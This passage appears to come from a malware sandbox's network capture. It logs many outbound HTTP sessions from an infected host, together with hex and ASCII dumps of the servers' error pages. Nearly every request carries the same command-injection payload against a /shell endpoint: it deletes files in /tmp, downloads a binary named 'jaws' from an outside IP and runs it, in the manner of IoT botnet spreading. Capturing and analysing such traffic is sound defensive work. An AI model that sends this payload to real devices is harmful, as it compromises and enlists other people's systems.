                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache Server at 127.0.0.1 Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            520192.168.2.2351534184.51.99.17580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:37.067102909 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:37.413389921 CET430INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 208
                                                            Expires: Fri, 26 Jan 2024 14:32:37 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:37 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 34 31 64 32 30 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 35 35 37 26 23 34 36 3b 39 35 35 62 32 66 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;641d2017&#46;1706279557&#46;955b2f1</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            521192.168.2.234979227.74.199.24180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:37.095913887 CET1286INHTTP/1.1 400 Bad Request
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            X-Frame-Options: SAMEORIGIN
                                                            Content-Security-Policy: frame-ancestors 'self';
                                                            Cache-Control: no-cache,no-store
                                                            Pragma: no-cache
                                                            Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 32 30 32 30 66 66 22 20 76 6c 69 6e 6b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0a 59 6f 75 72 20 72 65 71 75 65 73 74 20 68 61 73 20 62 61 64 20 73 79 6e 74 61 78 20 6f 72 20 69 73 20 69 6e 68 65 72 65 6e 74 6c 79 20 69 6d 70 6f 73 73 69 62 6c 65 20 74 6f 20 73 61 74 69 73 66 79 2e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0a 3c 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 49 46 5f 45 52 52 4f 52 53 54 52 3e 53 65 73 73 69 6f 6e 54 69 6d 65 6f 75 74 3c 2f 49 46 5f 45 52 52 4f 52 53 54 52 3e 0a 3c 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 0a 3c 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 0a 3c 2f 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50
                                                            Data Ascii: <html> <head><title>400 Bad Request</title></head> <body bgcolor="#FFFFFF" text="#000000" link="#2020ff" vlink="#4040cc"> <h2>400 Bad Request</h2>Your request has bad syntax or is inherently impossible to satisfy.<div style="display:none"><ajax_response_xml_root><IF_ERRORSTR>SessionTimeout</IF_ERRORSTR><IF_ERRORPARAM>SUCC</IF_ERRORPARAM><IF_ERRORTYPE>SUCC</IF_ERRORTYPE></ajax_response_xml_root><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>P
                                                            Jan 26, 2024 15:32:37.095930099 CET217INData Raw: 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e
                                                            Data Ascii: adding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span></div><hr /></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            522192.168.2.2344396159.192.157.680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:37.119862080 CET1286INHTTP/1.1 400 Bad Request
                                                            Server: ZTE web server 1.0 ZTE corp 2015.
                                                            Accept-Ranges: bytes
                                                            Connection: close
                                                            X-Frame-Options: SAMEORIGIN
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data:
                                                            Cache-Control: no-cache,no-store
                                                            Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 32 30 32 30 66 66 22 20 76 6c 69 6e 6b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0a 59 6f 75 72 20 72 65 71 75 65 73 74 20 68 61 73 20 62 61 64 20 73 79 6e 74 61 78 20 6f 72 20 69 73 20 69 6e 68 65 72 65 6e 74 6c 79 20 69 6d 70 6f 73 73 69 62 6c 65 20 74 6f 20 73 61 74 69 73 66 79 2e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0a 3c 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 49 46 5f 45 52 52 4f 52 53 54 52 3e 53 65 73 73 69 6f 6e 54 69 6d 65 6f 75 74 3c 2f 49 46 5f 45 52 52 4f 52 53 54 52 3e 0a 3c 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 0a 3c 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 0a 3c 2f 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69
                                                            Data Ascii: <html> <head><title>400 Bad Request</title></head> <body bgcolor="#FFFFFF" text="#000000" link="#2020ff" vlink="#4040cc"> <h2>400 Bad Request</h2>Your request has bad syntax or is inherently impossible to satisfy.<div style="display:none"><ajax_response_xml_root><IF_ERRORSTR>SessionTimeout</IF_ERRORSTR><IF_ERRORPARAM>SUCC</IF_ERRORPARAM><IF_ERRORTYPE>SUCC</IF_ERRORTYPE></ajax_response_xml_root><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show thi
                                                            Jan 26, 2024 15:32:37.119875908 CET270INData Raw: 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f
                                                            Data Ascii: s error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span></div><hr /><


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            523192.168.2.235645444.205.91.11580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:38.536897898 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            524192.168.2.2355482119.3.220.6880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:38.736140966 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:39.058828115 CET546INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22
                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"></head><body style="overflow:hidden"><div style="width: 450px; height: 300px; background: url(/images/error/404.png) no-repeat 50%; top:


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            525192.168.2.235716838.165.105.3080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:38.806869030 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:38.958425045 CET502INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Fri, 26 Jan 2024 14:32:35 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            526192.168.2.2359970154.201.21.16280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:39.039741993 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            527192.168.2.2350068104.87.193.15980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:39.122865915 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:39.439054012 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:32:39 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:39 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 63 34 61 34 33 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 35 35 39 26 23 34 36 3b 33 34 64 30 37 63 37 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;bc4a4317&#46;1706279559&#46;34d07c73</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            528192.168.2.234100434.96.71.2580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:39.548469067 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            529192.168.2.234653638.53.37.23080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:39.705177069 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:40.509769917 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:41.469646931 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:43.389307976 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:47.324846983 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:55.003688097 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            530192.168.2.2347626156.254.95.21580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:39.717818975 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:43.741324902 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:49.884418964 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:33:01.914741039 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            531192.168.2.234236295.216.144.14280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:39.873220921 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:40.100502014 CET48INHTTP/1.1 101 Switching Protocols


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            532192.168.2.2345194138.188.47.4680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:39.889154911 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:40.157931089 CET509INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html
                                                            Content-Length: 349
                                                            Connection: close
                                                            Date: Fri, 26 Jan 2024 14:32:40 GMT
                                                            Server: lighttpd
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            533192.168.2.2341804175.178.225.17180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:40.067307949 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
